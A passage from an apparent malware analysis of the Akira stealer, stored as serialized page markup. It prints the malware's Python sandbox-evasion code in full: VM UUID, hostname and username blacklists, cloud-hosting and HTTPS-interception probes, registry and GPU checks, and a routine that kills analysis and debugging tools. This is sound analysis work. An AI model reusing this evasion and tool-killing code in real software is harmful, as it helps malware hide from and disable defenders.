Thread(target=VmProtect.killTasks, daemon=True).start()\n",[102,12661,12662],{"class":104,"line":650},[102,12663,12664],{},"    if level == 1:\n",[102,12666,12667],{"class":104,"line":656},[102,12668,12669],{},"        # Fast path: HTTPS, hostname & user\n",[102,12671,12672],{"class":104,"line":662},[102,12673,12674],{},"        return (\n",[102,12676,12677],{"class":104,"line":668},[102,12678,12679],{},"            
VmProtect.checkHTTPSimulation()\n",[102,12681,12682],{"class":104,"line":674},[102,12683,12684],{},"            or VmProtect.checkComputerName()\n",[102,12686,12687],{"class":104,"line":680},[102,12688,12689],{},"            or VmProtect.checkUsers()\n",[102,12691,12693],{"class":104,"line":12692},11,[102,12694,12695],{},"        )\n",[102,12697,12699],{"class":104,"line":12698},12,[102,12700,12701],{},"    if level == 2:\n",[102,12703,12705],{"class":104,"line":12704},13,[102,12706,12707],{},"        # Deep scan: includes UUID, hosting, registry & GPU\n",[102,12709,12711],{"class":104,"line":12710},14,[102,12712,12713],{},"        try:\n",[102,12715,12717],{"class":104,"line":12716},15,[102,12718,12719],{},"            return (\n",[102,12721,12723],{"class":104,"line":12722},16,[102,12724,12725],{},"                VmProtect.checkHTTPSimulation()\n",[102,12727,12729],{"class":104,"line":12728},17,[102,12730,12731],{},"                or VmProtect.checkUUID()\n",[102,12733,12735],{"class":104,"line":12734},18,[102,12736,12737],{},"                or VmProtect.checkComputerName()\n",[102,12739,12741],{"class":104,"line":12740},19,[102,12742,12743],{},"                or VmProtect.checkUsers()\n",[102,12745,12747],{"class":104,"line":12746},20,[102,12748,12749],{},"                or VmProtect.checkHosting()\n",[102,12751,12753],{"class":104,"line":12752},21,[102,12754,12755],{},"                or VmProtect.checkRegistry()\n",[102,12757,12759],{"class":104,"line":12758},22,[102,12760,12761],{},"            )\n",[102,12763,12765],{"class":104,"line":12764},23,[102,12766,12767],{},"        except:\n",[102,12769,12771],{"class":104,"line":12770},24,[102,12772,12773],{},"            return False\n",[102,12775,12777],{"class":104,"line":12776},25,[102,12778,12779],{},"    return False\n",[186,12781,12783],{"id":12782},"_735-uuid-check-identifying-virtual-machines-via-hardware-uuid","7.3.5 UUID Check – Identifying Virtual Machines via Hardware 
UUID",[12,12785,192],{},[12,12787,12788],{},"A common tactic in malware evasion is fingerprinting the underlying hardware environment. One of the earliest identifiers that can signal a virtual machine is the system UUID (Universally Unique Identifier). Virtualization platforms like VMware and VirtualBox often generate predictable or reused UUIDs, which can be used by malware to infer whether it is running in a virtualized or sandboxed environment.",[56,12790,12792],{"className":12155,"code":12791,"language":12157,"meta":65,"style":65},"@staticmethod\ndef checkUUID() -> bool:\n    try:\n        raw = subprocess.run(\n            \"wmic csproduct get uuid\", shell=True,\n            capture_output=True\n        ).stdout.splitlines()[2].decode().strip()\n    except:\n        raw = \"\"\n    return raw in VmProtect.BLACKLISTED_UUIDS\n",[63,12793,12794,12798,12803,12808,12813,12818,12823,12828,12833,12838],{"__ignoreMap":65},[102,12795,12796],{"class":104,"line":105},[102,12797,12644],{},[102,12799,12800],{"class":104,"line":111},[102,12801,12802],{},"def checkUUID() -> bool:\n",[102,12804,12805],{"class":104,"line":329},[102,12806,12807],{},"    try:\n",[102,12809,12810],{"class":104,"line":346},[102,12811,12812],{},"        raw = subprocess.run(\n",[102,12814,12815],{"class":104,"line":650},[102,12816,12817],{},"            \"wmic csproduct get uuid\", shell=True,\n",[102,12819,12820],{"class":104,"line":656},[102,12821,12822],{},"            capture_output=True\n",[102,12824,12825],{"class":104,"line":662},[102,12826,12827],{},"        ).stdout.splitlines()[2].decode().strip()\n",[102,12829,12830],{"class":104,"line":668},[102,12831,12832],{},"    except:\n",[102,12834,12835],{"class":104,"line":674},[102,12836,12837],{},"        raw = \"\"\n",[102,12839,12840],{"class":104,"line":680},[102,12841,12842],{},"    return raw in VmProtect.BLACKLISTED_UUIDS\n",[12,12844,12845],{},"This check leverages the Windows Management Instrumentation Command-line (WMIC) tool to 
extract the UUID of the host machine. The returned value is then cross-checked against a curated list of UUIDs that are commonly associated with virtual machine templates or known analysis setups.",[186,12847,12849],{"id":12848},"_736-computer-name-check-detecting-sandbox-and-analysis-environments-via-hostname","7.3.6 Computer Name Check – Detecting Sandbox and Analysis Environments via Hostname",[12,12851,192],{},[12,12853,12854,12855,12858],{},"The system hostname, accessed via the ",[63,12856,12857],{},"%COMPUTERNAME%"," environment variable, often reveals clues about its environment. Analysts frequently use default or quickly-generated hostnames like \"DESKTOP-XXXXXXX\", \"WIN10ANALYSIS\", or even names linked to their internal environments. Malware takes advantage of this by comparing the system's hostname against a blacklist.",[56,12860,12862],{"className":12155,"code":12861,"language":12157,"meta":65,"style":65},"@staticmethod\ndef checkComputerName() -> bool:\n    name = os.getenv(\"computername\", \"\").lower()\n    return name in VmProtect.BLACKLISTED_COMPUTERNAMES\n\nBLACKLISTED_COMPUTERNAMES = (\n    '00900bc83802','bee7370c-8c0c-4','desktop-nakffmt',\n    'desktop-vkeons4','ntt-eff-2w11wss',\n    # ... 
dozens more entries ...\n)\n",[63,12863,12864,12868,12873,12878,12883,12887,12892,12897,12902,12907],{"__ignoreMap":65},[102,12865,12866],{"class":104,"line":105},[102,12867,12644],{},[102,12869,12870],{"class":104,"line":111},[102,12871,12872],{},"def checkComputerName() -> bool:\n",[102,12874,12875],{"class":104,"line":329},[102,12876,12877],{},"    name = os.getenv(\"computername\", \"\").lower()\n",[102,12879,12880],{"class":104,"line":346},[102,12881,12882],{},"    return name in VmProtect.BLACKLISTED_COMPUTERNAMES\n",[102,12884,12885],{"class":104,"line":650},[102,12886,11519],{"emptyLinePlaceholder":2181},[102,12888,12889],{"class":104,"line":656},[102,12890,12891],{},"BLACKLISTED_COMPUTERNAMES = (\n",[102,12893,12894],{"class":104,"line":662},[102,12895,12896],{},"    '00900bc83802','bee7370c-8c0c-4','desktop-nakffmt',\n",[102,12898,12899],{"class":104,"line":668},[102,12900,12901],{},"    'desktop-vkeons4','ntt-eff-2w11wss',\n",[102,12903,12904],{"class":104,"line":674},[102,12905,12906],{},"    # ... dozens more entries ...\n",[102,12908,12909],{"class":104,"line":680},[102,12910,12911],{},")\n",[12,12913,12914],{},"If a match is found, the malware may choose to halt execution or deploy a fake payload, thereby avoiding full behavioral analysis.",[186,12916,12918],{"id":12917},"_737-user-account-check-profiling-analyst-or-default-accounts","7.3.7 User Account Check – Profiling Analyst or Default Accounts",[12,12920,192],{},[12,12922,12923],{},"Another heuristic involves evaluating the username under which the malware is executed. Many virtual machine templates and sandboxes reuse common usernames such as \"Abby\", \"Test\", or \"wdagutilityaccount\". 
These names are low-entropy and often hardcoded in open source sandbox environments.",[56,12925,12927],{"className":12155,"code":12926,"language":12157,"meta":65,"style":65},"@staticmethod\ndef checkUsers() -> bool:\n    user = os.getlogin().lower()\n    return user in VmProtect.BLACKLISTED_USERS\n\nBLACKLISTED_USERS = (\n    'wdagutilityaccount','abby','peter wilson','hmarc',\n    'a.monaldo','tvm',\n    # ... 30+ more entries ...\n)\n",[63,12928,12929,12933,12938,12943,12948,12952,12957,12962,12967,12972],{"__ignoreMap":65},[102,12930,12931],{"class":104,"line":105},[102,12932,12644],{},[102,12934,12935],{"class":104,"line":111},[102,12936,12937],{},"def checkUsers() -> bool:\n",[102,12939,12940],{"class":104,"line":329},[102,12941,12942],{},"    user = os.getlogin().lower()\n",[102,12944,12945],{"class":104,"line":346},[102,12946,12947],{},"    return user in VmProtect.BLACKLISTED_USERS\n",[102,12949,12950],{"class":104,"line":650},[102,12951,11519],{"emptyLinePlaceholder":2181},[102,12953,12954],{"class":104,"line":656},[102,12955,12956],{},"BLACKLISTED_USERS = (\n",[102,12958,12959],{"class":104,"line":662},[102,12960,12961],{},"    'wdagutilityaccount','abby','peter wilson','hmarc',\n",[102,12963,12964],{"class":104,"line":668},[102,12965,12966],{},"    'a.monaldo','tvm',\n",[102,12968,12969],{"class":104,"line":674},[102,12970,12971],{},"    # ... 30+ more entries ...\n",[102,12973,12974],{"class":104,"line":680},[102,12975,12911],{},[12,12977,12978],{},"This check enhances detection by focusing on user context, which may remain unchanged even across reboots or virtual machine snapshots.",[186,12980,12982],{"id":12981},"_738-hosting-check-detecting-public-cloud-infrastructure","7.3.8 Hosting Check – Detecting Public Cloud Infrastructure",[12,12984,192],{},[12,12986,12987,12988,12991],{},"Some malware uses external IP intelligence services to verify whether the infected system resides in a known data center or cloud provider environment. 
In this case, a simple HTTP request is made to ",[63,12989,12990],{},"ip-api.com",", asking whether the IP is flagged as \"hosting\".",[56,12993,12995],{"className":12155,"code":12994,"language":12157,"meta":65,"style":65},"@staticmethod\ndef checkHosting() -> bool:\n    http = PoolManager(cert_reqs=\"CERT_NONE\")\n    try:\n        return http.request(\n            'GET',\n            'http://ip-api.com/line/?fields=hosting'\n        ).data.decode().strip() == 'true'\n    except:\n        return False\n",[63,12996,12997,13001,13006,13011,13015,13020,13025,13030,13035,13039],{"__ignoreMap":65},[102,12998,12999],{"class":104,"line":105},[102,13000,12644],{},[102,13002,13003],{"class":104,"line":111},[102,13004,13005],{},"def checkHosting() -> bool:\n",[102,13007,13008],{"class":104,"line":329},[102,13009,13010],{},"    http = PoolManager(cert_reqs=\"CERT_NONE\")\n",[102,13012,13013],{"class":104,"line":346},[102,13014,12807],{},[102,13016,13017],{"class":104,"line":650},[102,13018,13019],{},"        return http.request(\n",[102,13021,13022],{"class":104,"line":656},[102,13023,13024],{},"            'GET',\n",[102,13026,13027],{"class":104,"line":662},[102,13028,13029],{},"            'http://ip-api.com/line/?fields=hosting'\n",[102,13031,13032],{"class":104,"line":668},[102,13033,13034],{},"        ).data.decode().strip() == 'true'\n",[102,13036,13037],{"class":104,"line":674},[102,13038,12832],{},[102,13040,13041],{"class":104,"line":680},[102,13042,13043],{},"        return False\n",[12,13045,13046],{},"This allows the malware to determine if it’s running on infrastructure owned by Microsoft Azure, AWS, DigitalOcean, etc.—a red flag for sandboxing.",[186,13048,13050],{"id":13049},"_739-https-simulation-check-probing-for-ssl-interception","7.3.9 HTTPS Simulation Check – Probing for SSL Interception",[12,13052,192],{},[12,13054,13055,13056,13059],{},"To identify environments with SSL inspection (common in corporate or research networks), the malware issues a benign 
HTTPS request to a random subdomain under ",[63,13057,13058],{},".in",". If the connection fails—due to DNS filtering, interception proxies, or certificate pinning failures—it may signal that the malware is being analyzed.",[56,13061,13063],{"className":12155,"code":13062,"language":12157,"meta":65,"style":65},"@staticmethod\ndef checkHTTPSimulation() -> bool:\n    http = PoolManager(cert_reqs=\"CERT_NONE\", timeout=1.0)\n    try:\n        http.request('GET', f'https://blank-{Utils.GetRandomString()}.in')\n    except:\n        return False\n    return True\n",[63,13064,13065,13069,13074,13079,13083,13088,13092,13096],{"__ignoreMap":65},[102,13066,13067],{"class":104,"line":105},[102,13068,12644],{},[102,13070,13071],{"class":104,"line":111},[102,13072,13073],{},"def checkHTTPSimulation() -> bool:\n",[102,13075,13076],{"class":104,"line":329},[102,13077,13078],{},"    http = PoolManager(cert_reqs=\"CERT_NONE\", timeout=1.0)\n",[102,13080,13081],{"class":104,"line":346},[102,13082,12807],{},[102,13084,13085],{"class":104,"line":650},[102,13086,13087],{},"        http.request('GET', f'https://blank-{Utils.GetRandomString()}.in')\n",[102,13089,13090],{"class":104,"line":656},[102,13091,12832],{},[102,13093,13094],{"class":104,"line":662},[102,13095,13043],{},[102,13097,13098],{"class":104,"line":668},[102,13099,13100],{},"    return True\n",[12,13102,13103],{},"This subtle approach tests the network path's integrity without triggering alarms or requiring dedicated infrastructure.",[186,13105,13107],{"id":13106},"_7310-registry-gpu-driver-check-detecting-virtual-gpu-signatures","7.3.10 Registry & GPU Driver Check – Detecting Virtual GPU Signatures",[12,13109,192],{},[12,13111,13112,13113,13116],{},"Certain virtual environments are betrayed by registry keys or GPU driver descriptors. 
Akira executes a dual strategy: it queries registry entries tied to the graphics subsystem, and separately examines the output of ",[63,13114,13115],{},"wmic"," for suspicious GPU strings.",[56,13118,13120],{"className":12155,"code":13119,"language":12157,"meta":65,"style":65},"@staticmethod\ndef checkRegistry() -> bool:\n    r1 = subprocess.run(\n        \"REG QUERY HKLM\\\\...\\\\0000\\\\DriverDesc 2\",\n        capture_output=True, shell=True)\n    r2 = subprocess.run(\n        \"REG QUERY HKLM\\\\...\\\\0000\\\\ProviderName 2\",\n        capture_output=True, shell=True)\n\n    # GPU name check\n    gpu_out = subprocess.run(\n        \"wmic path win32_VideoController get name\",\n        capture_output=True, shell=True).stdout.decode().splitlines()\n    gpucheck = any(x in gpu_out[2].lower()\n                   for x in (\"virtualbox\", \"vmware\"))\n    return (r1.returncode != 1 and r2.returncode != 1) or gpucheck\n",[63,13121,13122,13126,13131,13136,13141,13146,13151,13156,13160,13164,13169,13174,13179,13184,13189,13194],{"__ignoreMap":65},[102,13123,13124],{"class":104,"line":105},[102,13125,12644],{},[102,13127,13128],{"class":104,"line":111},[102,13129,13130],{},"def checkRegistry() -> bool:\n",[102,13132,13133],{"class":104,"line":329},[102,13134,13135],{},"    r1 = subprocess.run(\n",[102,13137,13138],{"class":104,"line":346},[102,13139,13140],{},"        \"REG QUERY HKLM\\\\...\\\\0000\\\\DriverDesc 2\",\n",[102,13142,13143],{"class":104,"line":650},[102,13144,13145],{},"        capture_output=True, shell=True)\n",[102,13147,13148],{"class":104,"line":656},[102,13149,13150],{},"    r2 = subprocess.run(\n",[102,13152,13153],{"class":104,"line":662},[102,13154,13155],{},"        \"REG QUERY HKLM\\\\...\\\\0000\\\\ProviderName 2\",\n",[102,13157,13158],{"class":104,"line":668},[102,13159,13145],{},[102,13161,13162],{"class":104,"line":674},[102,13163,11519],{"emptyLinePlaceholder":2181},[102,13165,13166],{"class":104,"line":680},[102,13167,13168],{},"    # 
GPU name check\n",[102,13170,13171],{"class":104,"line":12692},[102,13172,13173],{},"    gpu_out = subprocess.run(\n",[102,13175,13176],{"class":104,"line":12698},[102,13177,13178],{},"        \"wmic path win32_VideoController get name\",\n",[102,13180,13181],{"class":104,"line":12704},[102,13182,13183],{},"        capture_output=True, shell=True).stdout.decode().splitlines()\n",[102,13185,13186],{"class":104,"line":12710},[102,13187,13188],{},"    gpucheck = any(x in gpu_out[2].lower()\n",[102,13190,13191],{"class":104,"line":12716},[102,13192,13193],{},"                   for x in (\"virtualbox\", \"vmware\"))\n",[102,13195,13196],{"class":104,"line":12722},[102,13197,13198],{},"    return (r1.returncode != 1 and r2.returncode != 1) or gpucheck\n",[12,13200,13201],{},"These hardware-layer checks are particularly effective against analyst setups that may not fully mask virtualized display adapters.",[186,13203,13205],{"id":13204},"_7311-task-killing-suppressing-analysis-tools-in-real-time","7.3.11 Task-Killing – Suppressing Analysis Tools in Real Time",[12,13207,192],{},[12,13209,13210],{},"Rather than only evading detection passively, Akira goes a step further by actively terminating known analysis or debugging tools. It spins off a background thread that iterates over a list of processes and kills any match it finds.",[56,13212,13214],{"className":12155,"code":13213,"language":12157,"meta":65,"style":65},"@staticmethod\ndef killTasks() -> None:\n    Utils.TaskKill(*VmProtect.BLACKLISTED_TASKS)\n\nBLACKLISTED_TASKS = (\n  'wireshark','fiddler','ida64','x32dbg','vmtoolsd',\n  # ... 
dozens more ...\n  'glasswire','requestly'\n)\n",[63,13215,13216,13220,13225,13230,13234,13239,13244,13249,13254],{"__ignoreMap":65},[102,13217,13218],{"class":104,"line":105},[102,13219,12644],{},[102,13221,13222],{"class":104,"line":111},[102,13223,13224],{},"def killTasks() -> None:\n",[102,13226,13227],{"class":104,"line":329},[102,13228,13229],{},"    Utils.TaskKill(*VmProtect.BLACKLISTED_TASKS)\n",[102,13231,13232],{"class":104,"line":346},[102,13233,11519],{"emptyLinePlaceholder":2181},[102,13235,13236],{"class":104,"line":650},[102,13237,13238],{},"BLACKLISTED_TASKS = (\n",[102,13240,13241],{"class":104,"line":656},[102,13242,13243],{},"  'wireshark','fiddler','ida64','x32dbg','vmtoolsd',\n",[102,13245,13246],{"class":104,"line":662},[102,13247,13248],{},"  # ... dozens more ...\n",[102,13250,13251],{"class":104,"line":668},[102,13252,13253],{},"  'glasswire','requestly'\n",[102,13255,13256],{"class":104,"line":674},[102,13257,12911],{},[12,13259,13260],{},"These tools—commonly used by incident responders and malware analysts—are neutralized before they can collect meaningful behavioral artifacts.",[12,13262,13263],{},[251,13264,4699],{},[12,13266,13267],{},"Akira uses a sophisticated suite of anti-analysis techniques that target multiple system layers — from environment variables and registry keys to network probes and task lists. 
These mechanisms are designed to detect and evade both automated sandboxes and manual inspection setups.",[12,13269,13270],{},"The combination of passive fingerprinting and active suppression (e.g., task killing) demonstrates how even mid-tier malware families now integrate multi-layer evasion logic.",[186,13272,13274],{"id":13273},"_7312-complete-blacklists-detection-functions","7.3.12 Complete Blacklists & Detection Functions",[12,13276,192],{},[12,13278,13279],{},[251,13280,13281],{},"Blacklisted Hardware UUIDs",[56,13283,13286],{"className":13284,"code":13285,"language":61},[59],"BLACKLISTED_UUIDS = (\n    '7AB5C494-39F5-4941-9163-47F54D6D5016',\n    '032E02B4-0499-05C3-0806-3C0700080009',\n    '03DE0294-0480-05DE-1A06-350700080009',\n    '11111111-2222-3333-4444-555555555555',\n    '6F3CA5EC-BEC9-4A4D-8274-11168F640058',\n    'ADEEEE9E-EF0A-6B84-B14B-B83A54AFC548',\n    '4C4C4544-0050-3710-8058-CAC04F59344A',\n    '00000000-0000-0000-0000-AC1F6BD04972',\n    '00000000-0000-0000-0000-000000000000',\n    '5BD24D56-789F-8468-7CDC-CAA7222CC121',\n    '49434D53-0200-9065-2500-65902500E439',\n    '49434D53-0200-9036-2500-36902500F022',\n    '777D84B3-88D1-451C-93E4-D235177420A7',\n    '49434D53-0200-9036-2500-369025000C65',\n    'B1112042-52E8-E25B-3655-6A4F54155DBF',\n    '00000000-0000-0000-0000-AC1F6BD048FE',\n    'EB16924B-FB6D-4FA1-8666-17B91F62FB37',\n    'A15A930C-8251-9645-AF63-E45AD728C20C',\n    '67E595EB-54AC-4FF0-B5E3-3DA7C7B547E3',\n    'C7D23342-A5D4-68A1-59AC-CF40F735B363',\n    '63203342-0EB0-AA1A-4DF5-3FB37DBB0670',\n    '44B94D56-65AB-DC02-86A0-98143A7423BF',\n    '6608003F-ECE4-494E-B07E-1C4615D1D93C',\n    'D9142042-8F51-5EFF-D5F8-EE9AE3D1602A',\n    '49434D53-0200-9036-2500-369025003AF0',\n    '8B4E8278-525C-7343-B825-280AEBCD3BCB',\n    '4D4DDC94-E06C-44F4-95FE-33A1ADA5AC27',\n    '79AF5279-16CF-4094-9758-F88A616D81B4',\n    'FE822042-A70C-D08B-F1D1-C207055A488F',\n    '76122042-C286-FA81-F0A8-514CC507B250',\n    
'481E2042-A1AF-D390-CE06-A8F783B1E76A',\n    'F3988356-32F5-4AE1-8D47-FD3B8BAFBD4C',\n    '9961A120-E691-4FFE-B67B-F0E4115D5919'\n)\n",[63,13287,13285],{"__ignoreMap":65},[12,13289,13290],{},[251,13291,13292],{},"Blacklisted Computer Names",[56,13294,13297],{"className":13295,"code":13296,"language":61},[59],"BLACKLISTED_COMPUTERNAMES = (\n    '00900BC83802', 'bee7370c-8c0c-4', 'desktop-nakffmt', 'win-5e07cos9alr',\n    'b30f0242-1c6a-4', 'desktop-vrsqlag', 'q9iatrkprh', 'xc64zb',\n    'desktop-d019gdm', 'desktop-wi8clet', 'server1', 'lisa-pc', 'john-pc',\n    'desktop-b0t93d6', 'desktop-1pykp29', 'desktop-1y2433r', 'wileypc',\n    'work', '6c4e733f-c2d9-4', 'ralphs-pc', 'desktop-wg3myjs',\n    'desktop-7xc6gez', 'desktop-5ov9s0o', 'qarzhrdbpj', 'oreleepc',\n    'archibaldpc', 'julia-pc', 'd1bnjkfvlh', 'compname_5076',\n    'desktop-vkeons4', 'NTT-EFF-2W11WSS'\n)\n",[63,13298,13296],{"__ignoreMap":65},[12,13300,13301],{},[251,13302,13303],{},"Blacklisted User Accounts",[56,13305,13308],{"className":13306,"code":13307,"language":61},[59],"BLACKLISTED_USERS = (\n    'wdagutilityaccount', 'abby', 'peter wilson', 'hmarc', 'patex',\n    'john-pc', 'rdhj0cnfevzx', 'keecfmwgj', 'frank', '8nl0colnq5bq',\n    'lisa', 'john', 'george', 'pxmduopvyx', '8vizsm', 'w0fjuovmccp5a',\n    'lmvwjj9b', 'pqonjhvwexss', '3u2v9m8', 'julia', 'heuerzl',\n    'harry johnson', 'j.seance', 'a.monaldo', 'tvm'\n)\n",[63,13309,13307],{"__ignoreMap":65},[12,13311,13312],{},[251,13313,13314],{},"Blacklisted Analysis‐Tool Processes",[56,13316,13319],{"className":13317,"code":13318,"language":61},[59],"BLACKLISTED_TASKS = (\n    'fakenet', 'dumpcap', 'httpdebuggerui', 'wireshark', 'fiddler',\n    'vboxservice', 'df5serv', 'vboxtray', 'vmtoolsd', 'vmwaretray',\n    'ida64', 'ollydbg', 'pestudio', 'vmwareuser', 'vgauthservice',\n    'vmacthlp', 'x96dbg', 'vmsrvc', 'x32dbg', 'vmusrvc', 'prl_cc',\n    'prl_tools', 'xenservice', 'qemu-ga', 'joeboxcontrol',\n    'ksdumperclient', 'ksdumper', 
'joeboxserver', 'vmwareservice',\n    'discordtokenprotector', 'glasswire', 'requestly'\n)\n",[63,13320,13318],{"__ignoreMap":65},[12,13322,13323],{},[251,13324,13325],{},"Core Detection Methods",[56,13327,13329],{"className":12155,"code":13328,"language":12157,"meta":65,"style":65},"@staticmethod\ndef checkUUID() -> bool:\n    \"\"\"WMIC hardware UUID against known VM IDs.\"\"\"\n    try:\n        raw = subprocess.run(\n            \"wmic csproduct get uuid\",\n            shell=True, capture_output=True\n        ).stdout.splitlines()[2].decode(errors='ignore').strip()\n    except:\n        raw = \"\"\n    return raw in VmProtect.BLACKLISTED_UUIDS\n\n@staticmethod\ndef checkComputerName() -> bool:\n    \"\"\"ENV %COMPUTERNAME% in VM name list.\"\"\"\n    return os.getenv(\"computername\", \"\").lower() in VmProtect.BLACKLISTED_COMPUTERNAMES\n\n@staticmethod\ndef checkUsers() -> bool:\n    \"\"\"Current login username in VM users list.\"\"\"\n    return os.getlogin().lower() in VmProtect.BLACKLISTED_USERS\n\n@staticmethod\ndef checkHosting() -> bool:\n    \"\"\"Query ip-api.com/hosting → 'true' indicates cloud VM.\"\"\"\n    http = PoolManager(cert_reqs=\"CERT_NONE\")\n    try:\n        return http.request(\n            'GET', 'http://ip-api.com/line/?fields=hosting'\n        ).data.decode().strip() == 'true'\n    except:\n        return False\n\n@staticmethod\ndef checkHTTPSimulation() -> bool:\n    \"\"\"\n    Attempt TLS to random subdomain.\n    Failure → possible HTTPS interception/sandbox.\n    \"\"\"\n    http = PoolManager(cert_reqs=\"CERT_NONE\", timeout=1.0)\n    try:\n        http.request('GET', f'https://blank-{Utils.GetRandomString()}.in')\n        return True\n    except:\n        return False\n\n@staticmethod\ndef checkRegistry() -> bool:\n    \"\"\"\n    Look for VirtualBox/VMware in:\n    - Registry driver entries\n    - Video card name via WMIC\n    - Presence of VM-specific folders\n    \"\"\"\n    r1 = subprocess.run(\n        \"REG QUERY 
HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\"\n        \"\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\DriverDesc 2\",\n        shell=True, capture_output=True\n    )\n    r2 = subprocess.run(\n        \"REG QUERY HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\"\n        \"\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\ProviderName 2\",\n        shell=True, capture_output=True\n    )\n    gpu = any(\n        x.lower() in subprocess.run(\n            \"wmic path win32_VideoController get name\",\n            shell=True, capture_output=True\n        ).stdout.decode().splitlines()[2].lower()\n        for x in (\"virtualbox\", \"vmware\")\n    )\n    dirs = any(os.path.isdir(d) for d in ('D:\\\\Tools','D:\\\\OS2','D:\\\\NT3X'))\n    return (r1.returncode != 1 and r2.returncode != 1) or gpu or dirs\n\n@staticmethod\ndef killTasks() -> None:\n    \"\"\"Continuously terminate known analysis processes.\"\"\"\n    Utils.TaskKill(*VmProtect.BLACKLISTED_TASKS)\n",[63,13330,13331,13335,13339,13344,13348,13352,13357,13362,13367,13371,13375,13379,13383,13387,13391,13396,13401,13405,13409,13413,13418,13423,13427,13431,13435,13440,13445,13450,13455,13461,13466,13471,13476,13481,13486,13491,13497,13503,13509,13514,13519,13524,13529,13535,13540,13545,13550,13555,13560,13565,13571,13577,13583,13589,13594,13599,13605,13611,13617,13623,13628,13633,13639,13644,13649,13655,13661,13667,13672,13678,13684,13689,13695,13701,13706,13711,13716,13722],{"__ignoreMap":65},[102,13332,13333],{"class":104,"line":105},[102,13334,12644],{},[102,13336,13337],{"class":104,"line":111},[102,13338,12802],{},[102,13340,13341],{"class":104,"line":329},[102,13342,13343],{},"    \"\"\"WMIC hardware UUID against known VM IDs.\"\"\"\n",[102,13345,13346],{"class":104,"line":346},[102,13347,12807],{},[102,13349,13350],{"class":104,"line":650},[102,13351,12812],{},[102,13353,13354],{"class":104,"line":656},[102,13355,13356],{},"            \"wmic csproduct get 
uuid\",\n",[102,13358,13359],{"class":104,"line":662},[102,13360,13361],{},"            shell=True, capture_output=True\n",[102,13363,13364],{"class":104,"line":668},[102,13365,13366],{},"        ).stdout.splitlines()[2].decode(errors='ignore').strip()\n",[102,13368,13369],{"class":104,"line":674},[102,13370,12832],{},[102,13372,13373],{"class":104,"line":680},[102,13374,12837],{},[102,13376,13377],{"class":104,"line":12692},[102,13378,12842],{},[102,13380,13381],{"class":104,"line":12698},[102,13382,11519],{"emptyLinePlaceholder":2181},[102,13384,13385],{"class":104,"line":12704},[102,13386,12644],{},[102,13388,13389],{"class":104,"line":12710},[102,13390,12872],{},[102,13392,13393],{"class":104,"line":12716},[102,13394,13395],{},"    \"\"\"ENV %COMPUTERNAME% in VM name list.\"\"\"\n",[102,13397,13398],{"class":104,"line":12722},[102,13399,13400],{},"    return os.getenv(\"computername\", \"\").lower() in VmProtect.BLACKLISTED_COMPUTERNAMES\n",[102,13402,13403],{"class":104,"line":12728},[102,13404,11519],{"emptyLinePlaceholder":2181},[102,13406,13407],{"class":104,"line":12734},[102,13408,12644],{},[102,13410,13411],{"class":104,"line":12740},[102,13412,12937],{},[102,13414,13415],{"class":104,"line":12746},[102,13416,13417],{},"    \"\"\"Current login username in VM users list.\"\"\"\n",[102,13419,13420],{"class":104,"line":12752},[102,13421,13422],{},"    return os.getlogin().lower() in VmProtect.BLACKLISTED_USERS\n",[102,13424,13425],{"class":104,"line":12758},[102,13426,11519],{"emptyLinePlaceholder":2181},[102,13428,13429],{"class":104,"line":12764},[102,13430,12644],{},[102,13432,13433],{"class":104,"line":12770},[102,13434,13005],{},[102,13436,13437],{"class":104,"line":12776},[102,13438,13439],{},"    \"\"\"Query ip-api.com/hosting → 'true' indicates cloud 
VM.\"\"\"\n",[102,13441,13443],{"class":104,"line":13442},26,[102,13444,13010],{},[102,13446,13448],{"class":104,"line":13447},27,[102,13449,12807],{},[102,13451,13453],{"class":104,"line":13452},28,[102,13454,13019],{},[102,13456,13458],{"class":104,"line":13457},29,[102,13459,13460],{},"            'GET', 'http://ip-api.com/line/?fields=hosting'\n",[102,13462,13464],{"class":104,"line":13463},30,[102,13465,13034],{},[102,13467,13469],{"class":104,"line":13468},31,[102,13470,12832],{},[102,13472,13474],{"class":104,"line":13473},32,[102,13475,13043],{},[102,13477,13479],{"class":104,"line":13478},33,[102,13480,11519],{"emptyLinePlaceholder":2181},[102,13482,13484],{"class":104,"line":13483},34,[102,13485,12644],{},[102,13487,13489],{"class":104,"line":13488},35,[102,13490,13073],{},[102,13492,13494],{"class":104,"line":13493},36,[102,13495,13496],{},"    \"\"\"\n",[102,13498,13500],{"class":104,"line":13499},37,[102,13501,13502],{},"    Attempt TLS to random subdomain.\n",[102,13504,13506],{"class":104,"line":13505},38,[102,13507,13508],{},"    Failure → possible HTTPS interception/sandbox.\n",[102,13510,13512],{"class":104,"line":13511},39,[102,13513,13496],{},[102,13515,13517],{"class":104,"line":13516},40,[102,13518,13078],{},[102,13520,13522],{"class":104,"line":13521},41,[102,13523,12807],{},[102,13525,13527],{"class":104,"line":13526},42,[102,13528,13087],{},[102,13530,13532],{"class":104,"line":13531},43,[102,13533,13534],{},"        return True\n",[102,13536,13538],{"class":104,"line":13537},44,[102,13539,12832],{},[102,13541,13543],{"class":104,"line":13542},45,[102,13544,13043],{},[102,13546,13548],{"class":104,"line":13547},46,[102,13549,11519],{"emptyLinePlaceholder":2181},[102,13551,13553],{"class":104,"line":13552},47,[102,13554,12644],{},[102,13556,13558],{"class":104,"line":13557},48,[102,13559,13130],{},[102,13561,13563],{"class":104,"line":13562},49,[102,13564,13496],{},[102,13566,13568],{"class":104,"line":13567},50,[102,13569,13570],{},"    
